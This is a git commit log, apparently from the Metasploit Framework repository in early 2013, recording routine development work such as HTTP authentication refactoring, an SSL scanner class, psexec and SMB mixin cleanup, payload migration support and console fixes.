Merge branch 'rapid7' into dmaloney-r7-feature/http/authv2
2013-02-22 15:41:49 -06:00
Meatballs
07475e5483
Update
2013-02-22 21:22:51 +00:00
sinn3r
56fa5ead37
Initial version of js_property_spray
2013-02-22 10:21:20 -06:00
James Lee
c423ad2583
Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7
2013-02-21 15:30:43 -06:00
David Maloney
d15e202f19
Add some YARD docs
2013-02-20 18:47:20 -06:00
David Maloney
8d2233bbdd
first minor cleanup
2013-02-20 15:33:24 -06:00
David Maloney
accd620843
Clean up pry
2013-02-19 23:50:30 -06:00
David Maloney
6abbbeb3ca
put gemcache for methodsource back
2013-02-19 22:17:25 -06:00
David Maloney
ac6fdf24a2
Fix winrm mixin from revert merge
2013-02-19 22:01:43 -06:00
David Maloney
b2563dd6c2
trying to clean up the mess from the revert
2013-02-19 21:25:37 -06:00
David Maloney
dac1147473
merge client config into opts
2013-02-19 19:41:42 -06:00
David Maloney
de4234f0ad
Some more YARD docs
2013-02-19 18:48:03 -06:00
David Maloney
a4905e43a2
Fix the way creds are passed + YARD
...
some ayrddocs on send_auth plus fix the wierd way i was passing creds
around
2013-02-19 18:40:39 -06:00
Tod Beardsley
3949c851a4
Was, indeed, missing an or pipe
2013-02-19 17:53:48 -06:00
Tod Beardsley
d81f177ab6
Adding Nemski's fix
...
[FixRM #7451 ]
2013-02-19 17:51:51 -06:00
David Maloney
0662677a72
First minor cleanup sweep
2013-02-19 17:19:16 -06:00
James Lee
4703278183
Move SMB mixins into their own directory
2013-02-19 12:55:06 -06:00
James Lee
ede804e6af
Make psexec mixin a bit better
...
* Removes copy-pasted code from psexec_command module and uses the mixin
instead
* Uses the SMB protocol to delete files rather than psexec'ing to call
cmd.exe and del
* Replaces several instances of "rescue StandardError" with better
exception handling so we don't accidentally swallow things like
NoMethodError
* Moves file reading and existence checking into the Exploit::SMB mixin
2013-02-19 12:33:19 -06:00
James Lee
867ab2f269
Whitespace
2013-02-18 19:01:03 -06:00
James Lee
b72d2b59f8
Add logging in case of exceptions during rm
2013-02-18 18:02:51 -06:00
corelanc0d3r
0d4a6c6a04
support for searchforward option in egghunter
2013-02-18 12:45:49 +01:00
David Maloney
d23ca8f599
Merge branch 'master' into feature/http/authv2
...
Conflicts:
lib/rex/proto/http/client.rb
2013-02-17 22:58:23 -06:00
David Maloney
87d9af585e
fix request_raw
2013-02-17 21:35:19 -06:00
David Maloney
dd26b08197
first run at Clientrequest object
...
need a reliable object class for request_raw and request_cgi so that we
can manipulate requests in a safe and sane manner. It is not a eprfect
solution, but should fix what we need for the auth work.
2013-02-17 19:25:27 -06:00
James Lee
a902480576
Break out subclasses into their own files
2013-02-17 06:57:35 -06:00
James Lee
0938190063
Merge branch 'rapid7' into R3dy-psexec-mixin2
2013-02-17 06:08:09 -06:00
James Lee
aea76a56de
Add some docs to FtpServer
2013-02-13 14:39:19 -06:00
Tod Beardsley
8ddc19e842
Unmerge #1476 and #1444
...
In that order. #1476 was an attempt to salvage the functionality, but
sinn3r found some more bugs. So, undoing that, and undoing #1444 as
well.
First, do no harm. It's obvious we cannot be making sweeping changes in
libraries like this without a minimum of testing available. #1478 starts
to address that, by the way.
FixRM #7752
2013-02-11 20:49:55 -06:00
David Maloney
adfd26eb2d
Cleanup to_s output
2013-02-11 17:08:14 -06:00
jvazquez-r7
d4d41f36d4
Merge branch 'bug/basic_auth' of https://github.com/dmaloney-r7/metasploit-framework into dmaloney-r7-bug/basic_auth
2013-02-11 21:16:35 +01:00
David Maloney
f90fdcd5eb
Missed nil check
2013-02-11 13:14:05 -06:00
David Maloney
0ccf7dd58a
trust any manualy set basic auth header
...
for now we will assume the module author knows what they are doing.
2013-02-11 13:06:26 -06:00
sinn3r
6e9232bf72
Merge branch 'addr_hex_dump' of github.com:Meatballs1/metasploit-framework into Meatballs1-addr_hex_dump
2013-02-11 11:31:54 -06:00
David Maloney
84534caae1
Fix expliciti basic_auth for http
2013-02-11 10:32:44 -06:00
David Maloney
0f9b16d07f
Scanner class finished, result needs more work
...
the result class needs a nice clean to_s method to print easily readable
output. mostly working now. a few more tweaks needed.
2013-02-09 19:06:17 -06:00
Meatballs
acdd952eb2
Initial commit
2013-02-09 21:50:12 +00:00
David Maloney
c25d4b4863
Test Cipher method underway
...
Trying to get a clever test plan under way to actually test the network
side of this. Not quite working yet
2013-02-09 01:07:56 -06:00
David Maloney
ebb0f166ca
Accept propper formats for SSL version
...
we were only accepting sloppy string values and not accepting input of
the actual symbols that OpenSSL expects in the first place. Allow the
user to enter it right themselves to be compat with OpenSSL
2013-02-09 00:40:58 -06:00
David Maloney
38d0a244fd
Beginings of the actual scanner
...
configuration and configuration validation in place with tests.
2013-02-09 00:03:58 -06:00
nemski
b8b445c834
Update lib/msf/core/auxiliary/login.rb
...
Fix for Bug #7451
2013-02-09 15:32:47 +11:00
Meatballs
595cace025
Fixup wldap32 mistakes
2013-02-08 22:25:07 +00:00
Meatballs
a980419285
msftidy
2013-02-08 21:02:37 +00:00
Meatballs
a6fea39583
Change to wldap to allow cdecl
2013-02-08 21:01:22 +00:00
Meatballs
a9bf09aa06
Add calling conv to railgun
2013-02-08 19:26:33 +00:00
David Maloney
3295157f78
More support for various checks
2013-02-08 13:25:49 -06:00
James Lee
99218d142b
Merge branch 'rapid7' into R3dy-psexec-mixin2
2013-02-08 12:48:06 -06:00
James Lee
5b3b0a8b6d
Merge branch 'dmaloney-r7-http/auth_methods' into rapid7
2013-02-08 12:45:35 -06:00
James Lee
2b3c8a68ad
Merge remote-tracking branch 'tasos-r7/feature/web_http_request_opts_override' into rapid7
2013-02-08 12:45:02 -06:00
James Lee
d2c7dbe160
Merge remote-tracking branch 'wchen-r7/type_error_dir_scanner' into rapid7
2013-02-08 12:39:08 -06:00
sinn3r
8798567d79
Fix bug: TypeError can't convert Fixnum into String
...
wmap_target_port is retrieved from datastore['RPORT'], and that's a
Fixnum. But wmap_base_url is treating that like a String, so when a
module uses that function, it's doomed.
See:
http://dev.metasploit.com/redmine/issues/7748
2013-02-08 12:05:27 -06:00
David Maloney
dfc7ce9381
fix stupid datat structure
...
also supports a boolean value for whether the cipher is weak or not
2013-02-08 11:33:36 -06:00
James Lee
071df7241b
Merge branch 'rapid7' into sonicwall_gms
...
Conflicts:
modules/exploits/multi/http/sonicwall_gms_upload.rb
Adds a loop around triggering the WAR payload, which was causing some
unreliability with the Java target.
2013-02-07 21:53:49 -06:00
James Lee
e535a3e93f
Guard against running broken method on non-windows
...
This just puts a bandaid around the issue and makes it so FileDropper
doesn't completely break java and posix meterpreter sessions.
[SeeRM #7721 ]
2013-02-07 21:10:27 -06:00
James Lee
16a0ab1933
Fix comment link and some whitespace
2013-02-07 18:37:11 -06:00
James Lee
bf28be7cff
Fix some comments that yard parsed incorrectly
2013-02-07 18:36:04 -06:00
James Lee
13d1045989
Works for java and native linux targets
2013-02-07 16:56:38 -06:00
David Maloney
5c9f946927
empty shells for the scanner and its specs
2013-02-07 16:16:41 -06:00
David Maloney
096360261e
De-dup cipher results
2013-02-07 16:09:47 -06:00
David Maloney
4e87bf4ab3
Add enumeration and support options
...
i lied, there's more. Adds two enumerators and methods to check for
specific ssl version support as well as a quick method to tell if the
server supports ssl at all.
2013-02-07 15:51:07 -06:00
David Maloney
10e017ae73
finish up the SSLScan::Result class
...
finishes up result class for SSLScan , compelte with tests
2013-02-07 14:56:26 -06:00
David Maloney
7036365e04
Start adding sslscan results object
...
Building out the result object for the SSlScan
2013-02-07 12:42:18 -06:00
James Lee
a15889305a
Return a Request object
...
Still changes the return type, but now at least .to_s will give you the
right thing and at least a Request object is a logical thing to return.
2013-02-06 18:56:06 -06:00
David Maloney
ebd03ccceb
Allow user to set ssl cipher
...
Rex::Socket::Tcp now allows the user to specify a cipher or ciphers to
try and use for the ssl connection in addition to the version.
2013-02-06 16:57:47 -06:00
Tasos Laskos
b3e828359d
Web::HTTP#_request: allow Rex opt level overrides
...
Allow overriding options at the Rex level when performing requests
via the Auxiliary::Web::HTTP wrapper.
2013-02-06 01:02:46 +02:00
David Maloney
888bb80ab6
more comments
2013-02-05 11:55:12 -06:00
David Maloney
16b4fb1faa
Added some comment documentation
2013-02-05 10:36:51 -06:00
David Maloney
463a45ccaf
if we don't support the auth return original res
...
make sure we return the original 401 if we don't support the auth.
2013-02-05 09:57:33 -06:00
David Maloney
877fb017b6
remove negotiate requirements
...
winrm can support basic, and now these modules can too, for free
2013-02-04 16:50:43 -06:00
David Maloney
af6b0615fb
fix pipelining
...
winrm is unforgiving of pipelining from non ntlm requests into the
challenge response cycle. we must clear our initial tcp session before
starting ntlm auth for winrm
2013-02-04 16:42:24 -06:00
David Maloney
44d4e298dc
Attempting to cleanup winrm auth
2013-02-04 15:48:31 -06:00
David Maloney
c71b803413
Add invisible auth to web crawler
...
the anemone web crawler now properly supports our invisible auth scheme
for rex http.
2013-02-04 14:38:08 -06:00
David Maloney
9b84e5b3c4
Fix raw requests to work as well as cgi
2013-02-04 13:59:58 -06:00
David Maloney
413c37e506
Add invisible auth to Web::HTTP
...
add the invisible auth support to tasos' http class
2013-02-04 13:39:40 -06:00
David Maloney
0c57026065
Remove junk added earlier
...
i added junk to tasos' class when we were going to attempt this a
different way. housekeeping to clean it up
2013-02-04 13:13:08 -06:00
David Maloney
8d013d1034
Merge branch 'master' into http/auth_methods
2013-02-04 13:11:57 -06:00
David Maloney
9497e38ef7
Fix http login scanner
...
Fix the http_login scanner to use new buitin auth
2013-02-04 12:31:19 -06:00
Royce Davis
7faaa635d3
Fixed exception handling to use smb::proto
2013-02-03 18:46:41 -06:00
HD Moore
797e2604a0
Fix missing require in reverse_tcp_ssl
2013-02-03 17:41:45 -06:00
RageLtMan
ffb88baf4a
initial module import from SV rev_ssl branch
2013-02-03 15:06:24 -05:00
HD Moore
c3801ad083
This adds an openssl CMD payload and handler
2013-02-03 04:44:25 -06:00
David Maloney
8d817dcbb5
fix iis digest support mistake
...
Digest auth working automatically
2013-02-01 15:49:18 -06:00
David Maloney
6c12fa26bc
oodles of small fixes
...
Basic, NTLM and Negotiate auth all working transparently
Have to test digest auth still
2013-02-01 15:12:11 -06:00
David Maloney
61969d575b
remove mixin require, more datastore clenaup
2013-02-01 15:12:11 -06:00
David Maloney
efe0947286
Start fixing datastore options
2013-02-01 15:12:11 -06:00
David Maloney
ef1fc58e5e
Remove mixin, start moving into Rex
...
move auth awareness into rex itself
2013-02-01 15:12:11 -06:00
David Maloney
c407fa9e74
add mixjn
2013-02-01 15:12:11 -06:00
David Maloney
5814c59620
move httpauth to mixin
...
HttpAuth stuff gets it's own little mixin
mix it in to Exploit::Http::Client
mix in it to Auxiliary::Web::HTTP
2013-02-01 15:12:10 -06:00
David Maloney
8e870f3654
merge in sinn3r's changes
2013-02-01 15:12:10 -06:00
jvazquez-r7
70b252dc7b
Merge branch 'normalize_uri_update2' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-normalize_uri_update2
2013-01-31 22:32:50 +01:00
jvazquez-r7
174ab31010
Moving reused methods to Accounts mixin
2013-01-31 12:59:55 +01:00
sinn3r
95cc84f5e8
Updates normalize_uri()
...
This function should not remove the trailing slash, because you may
end up getting a different HTTP response. The new function also
allows multiple URIs as argument, and will just merge & normalize
them together. [SeeRM #7733 ]
2013-01-30 15:42:21 -06:00
jvazquez-r7
1e1cbd7445
Merge branch 'wldap32_railgun' of https://github.com/Meatballs1/metasploit-framework into Meatballs1-wldap32_railgun
2013-01-30 21:01:31 +01:00
Tod Beardsley
6002e35460
Merge pull request #1397 from wchen-r7/target_uri_fix
...
normalize_uri fixes (double slashes and trailing slash)
2013-01-29 11:26:30 -08:00
Tod Beardsley
c42d4a6617
Merge for CVE-2013-0156 RoR Exploit
...
Also massages the RUBY payload.
2013-01-28 23:06:05 -06:00
James Lee
92c736a6a9
Move fork stuff out of exploit into payload mixin
...
Tested xml against 3.2.10 and json against 3.0.19
2013-01-28 21:34:39 -06:00
sinn3r
9a58b7b732
Fix normalize_uri() function
...
This will make sure all the double slashes are gone. Also, the
function description is updated to clarify its purpose.
2013-01-28 12:10:21 -06:00
sinn3r
fc833ea8df
Catch exceptions and return value
2013-01-28 10:30:59 -06:00
James Lee
3fc9b5d636
Doc cleanup
2013-01-28 00:01:45 -06:00
rogueclown
169f91159e
added 'from' PID to meterpreter migrate message
2013-01-27 21:18:49 -06:00
Tod Beardsley
2965fa480e
Some errant spaces
2013-01-25 05:41:28 -06:00
Tasos Laskos
a081389f86
Auxiliary::Web, Exploit::Remote::Web: style updates
2013-01-29 03:08:53 +02:00
Tasos Laskos
76e0305dcf
Merge remote-tracking branch 'upstream/master' into web-modules
2013-01-29 01:06:26 +02:00
Rob Fuller
27aae87c18
Stop aggravating default show screenshot
...
A better fix would have it detect default browsers
as being text only like lynx. But this has got to
go one way or another. Loosing shell because I forgot
to do -v false is wall punch worthy
2013-01-24 22:06:51 -05:00
scriptjunkie
d9e1653443
Use EXITFUNC if present to save space and be more correct.
...
Jump straight to payload on process failure to save space.
2013-01-24 17:14:25 -06:00
Tasos Laskos
9aaca2eae9
Auxiliary::Web::HTTP: updated exception handling
...
[FIXRM #7724 ]
Updated #run and #_requestto rescue and elog all exception.
2013-01-24 22:07:17 +02:00
Trevor Rosen
60e871b8d4
Merge pull request #1365 from todb-r7/banner-logos
...
Delivers Pro #41793473
2013-01-24 09:07:41 -08:00
Tasos Laskos
477ab65d55
Exploit::Remote::Web: added #tries method
...
#tries method indicates how many times we should run a module until
we establish a session.
2013-01-23 23:05:22 +02:00
Tod Beardsley
e920594534
Whitespace cleanup, no blank lines plz
2013-01-23 14:23:38 -06:00
Tod Beardsley
d0382b68c7
One more backslash
2013-01-23 14:18:40 -06:00
Tod Beardsley
40dcbe0e89
Fix escaping, whitespace
...
Since banners are now just data and not code, they don't need their
backslashes escaped any more.
2013-01-23 14:16:49 -06:00
Tod Beardsley
537e12cf16
Render the banners nicely
2013-01-23 13:59:34 -06:00
HD Moore
b4f5c3b6ed
Fix up set_rhosts for all db commands
2013-01-23 10:10:02 -06:00
HD Moore
1477cda3d4
fix set_rhosts behavior/bugs.
...
msf exploit(rails_xml_yaml_code_exec) > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.0.0.105 00:0C:29:59:65:08 VMWIN2000SP4 Microsoft Windows client
msf exploit(rails_xml_yaml_code_exec) > hosts -R
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.0.0.105 00:0C:29:59:65:08 VMWIN2000SP4 Microsoft Windows client
RHOSTS => 10.0.0.105
msf exploit(rails_xml_yaml_code_exec) > exit
2013-01-23 10:00:24 -06:00
sinn3r
9e5370eb2f
Merge branch 'slight_speedup_to_db_hosts-R' of github.com:kernelsmith/metasploit-framework into kernelsmith-slight_speedup_to_db_hosts-R
2013-01-23 00:20:55 -06:00
James Lee
ff7756cd54
Make #prepends() actually work
2013-01-22 16:10:44 -06:00
Tasos Laskos
33e9f182bd
Merge remote-tracking branch 'upstream/master' into web-modules
2013-01-22 23:43:25 +02:00
Tasos Laskos
6b5c6c3a0c
Auxiliary::Web::Analysis::Differential
...
Removed payload option from #process_vulnerability call
2013-01-22 23:41:36 +02:00
Tasos Laskos
0d564c1ce8
Auxiliary::Web::Analysis::Timing
...
Updated to pick the largest matching payload from the payload list.
2013-01-22 23:40:30 +02:00
Tasos Laskos
f2beb5bf19
Auxiliary::Web#process_vulnerability: payload fix
...
Updated to pick the largest matching payload from the payload list.
2013-01-22 23:39:16 +02:00
James Lee
c37510f777
Move prependmigrate.rb for naming consistency
2013-01-22 14:15:52 -06:00
James Lee
04adaf0e9d
Unstupid the prepends callback
...
Windows#prepends was overriding PrependMigrate#prepends
2013-01-22 13:56:26 -06:00
James Lee
32aa2c6d9c
Make asm spacing easier to read
...
Also adds a #prepends callback to Payload::Windows to make it a little
clearer what's happening.
2013-01-22 13:25:27 -06:00
Tasos Laskos
fed4a836c6
Updated proof string for Web Differential Analysis
...
Manipulatable responses => Boolean manipulation
2013-01-22 20:29:57 +02:00
Royce Davis
81625121f2
Cleaned up some code spacing
2013-01-22 09:49:03 -06:00
Raphael Mudge
4740cb09a1
Fix NoMethodError if handler has no ParentModule
...
db.rb assumes that multi/handler sessions have a ParentModule defined
in their datastore. This assumption breaks when a user sets up a
multi/handler by hand to receive a session from another user (e.g.,
via multi_meter_inject).
When db.rb tries to access a member of a nil ParentModule, a
stacktrace is dumped to framework.log.
2013-01-22 02:56:43 -05:00
HD Moore
d6ed6cd5e4
Fix a stack overflow in bidirectional pipe
2013-01-22 00:27:03 -06:00
kernelsmith
52596ae3b4
add -R capability like hosts -R
...
moves the set_rhosts method def out into a separate file so it can be
included by both db.rb cmd_hosts and core.rb cmd_grep
2013-01-21 18:17:28 -06:00
jvazquez-r7
b2c7223108
Cleanup for mysql_file_enum.rb
2013-01-21 12:26:35 +01:00
kernelsmith
f05e358058
replace unless rhosts.include? with rhosts.uniq!
...
seems like this will speed up the process due to far less Array lookups
2013-01-21 00:46:05 -06:00
Robin Wood
23d1eb7a80
File/dir brute forcer using MySQL
2013-01-20 21:23:58 +00:00
Meatballs1
567185ec65
Better cleanup and address comments
2013-01-20 00:19:17 +00:00
Meatballs1
4ee80e76bd
msftidy wldap32
2013-01-19 23:15:20 +00:00
scriptjunkie
66d5f39057
Ensure prepend_migrate? always functions correctly.
2013-01-18 18:04:09 -06:00
scriptjunkie
6c046dfa69
Move PrependMigrate to a mixin
2013-01-18 17:45:36 -06:00
scriptjunkie
07bf36f62f
Ensure shell still works if PrependMigrateProc fails to launch.
...
Don't rely on GetStartupInfoA return value.
2013-01-18 17:32:50 -06:00
scriptjunkie
52251867d8
Ensure Windows single payloads use payload backend
...
This means the singles that define their own assembly will use the payload backend to generate it.
2013-01-18 16:34:39 -06:00
scriptjunkie
16d065adfc
Fix issue with singles.
...
Single now plays more nicely with other mixins, so PrependMigrate works.
2013-01-18 16:34:39 -06:00
scriptjunkie
b01374904b
tidy EOL spaces
2013-01-18 16:34:39 -06:00
scriptjunkie
15268cae73
Add X64 PrependMigrate support
2013-01-18 16:34:39 -06:00
scriptjunkie
c97be836c3
Fix error calculating payload sizes.
...
Error meant most Windows payloads were marked as incompatible with many exploits.
2013-01-18 16:34:39 -06:00
scriptjunkie
725d4d7194
Re-use block_api code in migrate stub if possible
...
Makes payload significantly smaller.
2013-01-18 16:34:38 -06:00
scriptjunkie
0b32111a9f
Revert "Revert "Merge branch 'migrator' of git://github.com/scriptjunkie/metasploit-framework into scriptjunkie-migrator""
...
This reverts commit 2436ac3a58
.
2013-01-18 16:34:38 -06:00
Tod Beardsley
9f42abdb95
Whitespace fixup
2013-01-18 15:44:52 -06:00
Tod Beardsley
0c3e7ee3e0
Merge remote-tracking branch 'Meatballs1/reboot_force2'
2013-01-18 15:01:51 -06:00
Tod Beardsley
bfd58e9570
Add a comment doc for future parser writers
2013-01-18 14:59:41 -06:00
Tod Beardsley
ef97b20cb7
Merge branch 'wds_unattend'
2013-01-18 14:42:00 -06:00
Royce Davis
a2f66a8fef
Fixed msftidy complaints
2013-01-18 09:33:44 -06:00
Royce Davis
00a9c72595
Fixed exception handeling. No longer using rescure StandardError
2013-01-17 19:02:13 -06:00
kernelsmith
6e8e7a407d
adds a .nil? check as well
2013-01-17 00:30:58 -06:00
kernelsmith
7090a4a82f
adds check for empty data b4 sending to parser [RM7269]
...
[fixes RM7269]
we discussed the solution to this bug a lot on IRC and in the ticket
itself, the consensus was to fix it as far upstream as possible before
sending to the parsers so as to avoid any future bugs of the same
nature, so this commit adds a check to import_nmap_xml to see if the
data is empty before passing it on to the parser, whether that parser
is nokogiri or the legacy parser.
db_nmap -h now produces the expected output and db_nmap still works as
expected.
2013-01-17 00:18:13 -06:00
James Lee
4fd4af1f43
Fix typo that breaks record_mic command
2013-01-16 16:30:38 -06:00
Royce Davis
f7571d89de
Fixed cleanup_after funciton to mimic file_dropper but not use file_dropper
2013-01-16 09:56:27 -06:00
kernelsmith
b1dbbe3baa
msftidy eol fixes
2013-01-16 00:59:45 -06:00
kernelsmith
3210c5382e
undo vestiges of attempt to add tab_complete nesting
...
return code to original state before I started editing
2013-01-16 00:49:54 -06:00
kernelsmith
f7195fb5b5
handle unknown commands more informatively
...
before it just returned nothing, now it prints the familiar "Unkown
command: " message
2013-01-16 00:39:22 -06:00
sinn3r
c621e83ffe
Merge branch 'feature/stage_encoding' of github.com:jlee-r7/metasploit-framework into jlee-r7-feature/stage_encoding
2013-01-15 23:31:40 -06:00
kernelsmith
204b43b0d3
fix typo in args.shift
2013-01-15 22:44:55 -06:00
kernelsmith
2a6a833931
prompt fixes (restores prompt context) & normalization
...
Msf::Ui::Console::Driver::DefaultPrompt and
Msf::Ui::Console::Driver::Default should be used when default is desired
2013-01-15 22:24:36 -06:00
kernelsmith
ad8516eacf
fixed prompt issue, still need to restore context
...
see line 2519 area.
msf exploit(psexec) > grep -i -A 2 encoding show
<snip>
msf>
2013-01-15 17:57:28 -06:00
kernelsmith
4d33742482
fixed bug with -A
2013-01-15 17:35:57 -06:00
kernelsmith
86e4bb2db5
yard doc fixed and added for all _tabs methods
2013-01-15 16:42:02 -06:00
Royce Davis
6773a10632
Made changes to cleanup to use file_dropper instead
2013-01-15 16:24:16 -06:00
kernelsmith
c60556389f
add yard doc and allow for -A and -B at same time
2013-01-15 16:22:04 -06:00
James Lee
26b40666ce
Merge branch 'rapid7' into feature/stage_encoding
2013-01-15 15:10:58 -06:00
Royce Davis
7361e1041f
Merge commit '5e8f388ab8425bf2ef4c2fe33e6133b99ceb46d4' into psexec-mixin2
2013-01-15 14:49:21 -06:00
Royce Davis
6f17ed96db
Merge https://github.com/rapid7/metasploit-framework into psexec-mixin2
2013-01-15 14:48:20 -06:00
James Lee
af2b1ec25b
Clean up doc comments
2013-01-15 14:22:11 -06:00
James Lee
ee14c1c613
Merge remote-tracking branch 'R3dy/psexec-mixin2' into rapid7
2013-01-15 12:58:50 -06:00
James Lee
4883cf4b01
Minor doc comment additions
2013-01-15 12:49:43 -06:00
James Lee
d36e38fca6
Move encoding into handle_connection
...
* Allows payloads that override generate_stage to still take advantage
of stage encoding
* Also adds doc comments for a few methods
2013-01-15 10:34:31 -06:00
Tod Beardsley
9d4366fdab
Merge remote-tracking branch 'wchen-r7/irb_terminatelineinput'
2013-01-15 01:50:15 -08:00
Tod Beardsley
6064dfcb71
Merge remote-tracking branch 'wchen-r7/fail_to_reload_fix'
2013-01-15 01:43:07 -08:00
kernelsmith
9ad726167e
changes to address scriptjunkie's rpc concerns
...
as described in https://github.com/rapid7/metasploit-framework/pull/820
2013-01-14 17:14:48 -06:00
James Lee
a1e853500f
Merge branch 'bug/optint_empty' into feature/stage_encoding
2013-01-14 15:50:39 -06:00
James Lee
21c18b78e6
Don't bother nil check, to_s handles it
2013-01-14 15:47:58 -06:00
James Lee
0c90171fa7
Deal with alread-normalized ints
...
[See #1308 ][See #1304 ]
2013-01-14 15:31:14 -06:00
James Lee
fb19ec1005
Merge branch 'rapid7' into feature/stage_encoding
2013-01-14 15:20:23 -06:00